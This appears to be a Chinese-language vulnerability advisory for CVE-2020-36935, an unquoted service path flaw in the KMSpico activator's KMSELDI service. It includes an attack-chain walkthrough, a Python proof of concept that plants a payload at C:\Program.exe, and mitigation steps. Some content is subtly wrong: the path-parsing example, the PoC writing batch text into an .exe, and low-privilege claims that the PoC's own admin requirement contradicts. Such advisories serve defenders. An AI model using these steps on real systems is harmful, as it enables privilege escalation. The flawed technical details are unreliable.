CVE-2020-36935 | KMSpico Service_KMS.exe 未引用服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2020-36935

漏洞类型

未引用服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

KMSpico 17.1.0.0

漏洞概述

CVE-2020-36935是KMSpico 17.1.0.0版本中存在的一个高危本地权限提升漏洞。该漏洞源于Windows服务配置中的未引用服务路径(Unquoted Service Path)问题。KMSpico是一款非官方的Windows和Office激活工具，其Service KMSELDI服务在安装过程中未正确引用可执行文件路径。当服务配置中的路径包含空格且未用引号包裹时，Windows服务管理器会从左到右解析路径，在遇到第一个空格时停止，并将剩余部分视为命令行参数。攻击者可以利用这一特性，在服务路径中的目录放置恶意可执行文件，从而在服务重启或系统启动时以SYSTEM高权限自动执行恶意代码，实现本地权限提升。该漏洞CVSS评分7.8，属于高危级别，对系统安全构成严重威胁。

技术细节

未引用服务路径漏洞(Unquoted Service Path)是一种Windows本地权限提升漏洞。当Windows服务的可执行文件路径包含空格且未被双引号包裹时，服务启动时会发生路径解析歧义。以本漏洞为例，服务配置的路径为C:\Program Files\KMSpico\Service_KMS.exe，Windows会首先尝试执行C:\Program.exe，如果不存在则尝试执行C:\Program Files\Service_KMS.exe。攻击者可以在C:\Program.exe位置放置恶意可执行文件，当服务启动时便会以SYSTEM权限执行。KMSpico的Service KMSELDI服务具有自动启动特性，攻击者只需在服务重启或系统启动时等待恶意代码执行即可获得系统最高权限。该漏洞利用条件简单，无需特殊认证，适用于所有未安装安全补丁的Windows系统版本。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过扫描系统发现KMSpico安装的服务，识别服务名称为KMSELDI，路径为C:\Program Files\KMSpico\Service_KMS.exe

STEP 2

步骤2: 漏洞验证

攻击者确认服务路径包含空格且未被引号包裹，存在未引用服务路径漏洞

STEP 3

步骤3: 恶意文件植入

攻击者获取本地低权限后，将恶意可执行文件(如Program.exe)写入C:\根目录

STEP 4

步骤4: 服务触发

等待KMSELDI服务重启、系统重启或通过社会工程学诱导管理员重启服务

STEP 5

步骤5: 权限提升

Windows服务启动时首先执行C:\Program.exe，该文件以SYSTEM高权限运行，攻击者成功获得系统最高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2020-36935 PoC - KMSpico Unquoted Service Path
# Author: Security Researcher
# Target: KMSpico 17.1.0.0 Service KMSELDI
# This PoC demonstrates the unquoted service path vulnerability

import os
import sys
import subprocess
import time

def check_vulnerability():
    """Check if the system is vulnerable to CVE-2020-36935"""
    service_name = "KMSELDI"
    malicious_path = r"C:\Program.exe"
    
    # Check if the vulnerable service exists
    try:
        result = subprocess.run(
            ["sc", "qc", service_name],
            capture_output=True,
            text=True
        )
        if result.returncode == 0 and "BINARY_PATH_NAME" in result.stdout:
            print(f"[+] Service '{service_name}' found")
            
            # Check if the path is unquoted
            if "Program Files" in result.stdout and '"' not in result.stdout:
                print("[+] VULNERABLE: Service path is unquoted!")
                print("[+] Malicious executable can be placed at:", malicious_path)
                return True
            else:
                print("[-] Service path appears to be properly quoted")
                return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_malicious_executable():
    """Create a simple malicious executable for demonstration"""
    malicious_path = r"C:\Program.exe"
    payload = '''
@echo off
rem CVE-2020-36935 - Malicious Payload
rem This will execute with SYSTEM privileges
echo [+] CVE-2020-36935 Payload Executed > C:\\temp\\cve_poc.txt
date /t >> C:\\temp\\cve_poc.txt
time /t >> C:\\temp\\cve_poc.txt
echo [!] Running with elevated privileges >> C:\\temp\\cve_poc.txt
'''
    
    try:
        os.makedirs(r"C:\temp", exist_ok=True)
        with open(malicious_path, 'w') as f:
            f.write(payload)
        print(f"[+] Malicious executable created at: {malicious_path}")
        print("[!] In real attack, this would be a compiled executable")
        return True
    except PermissionError:
        print("[-] Requires administrator privileges to create malicious executable")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

def main():
    print("="*60)
    print("CVE-2020-36935 - KMSpico Unquoted Service Path Checker")
    print("="*60)
    
    if check_vulnerability():
        print("\n[*] To exploit this vulnerability:")
        print("    1. Place malicious executable at C:\\Program.exe")
        print("    2. Wait for service restart or system reboot")
        print("    3. Malicious code will execute with SYSTEM privileges")
        print("\n[*] For demonstration, creating sample payload...")
        create_malicious_executable()
    else:
        print("\n[-] System does not appear to be vulnerable")

if __name__ == "__main__":
    main()

影响范围

KMSpico 17.1.0.0

防御指南

临时缓解措施

立即停止使用KMSpico等非官方激活工具，卸载相关组件。由于KMSpico属于非法破解软件，建议用户获取正版Windows/Office授权。如无法立即卸载，可通过命令'sc config KMSELDI binPath= "C:\Program Files\KMSpico\Service_KMS.exe"'为服务路径添加引号进行临时修复，同时删除C:\Program.exe等可疑文件，并启用端点防护软件实时监控。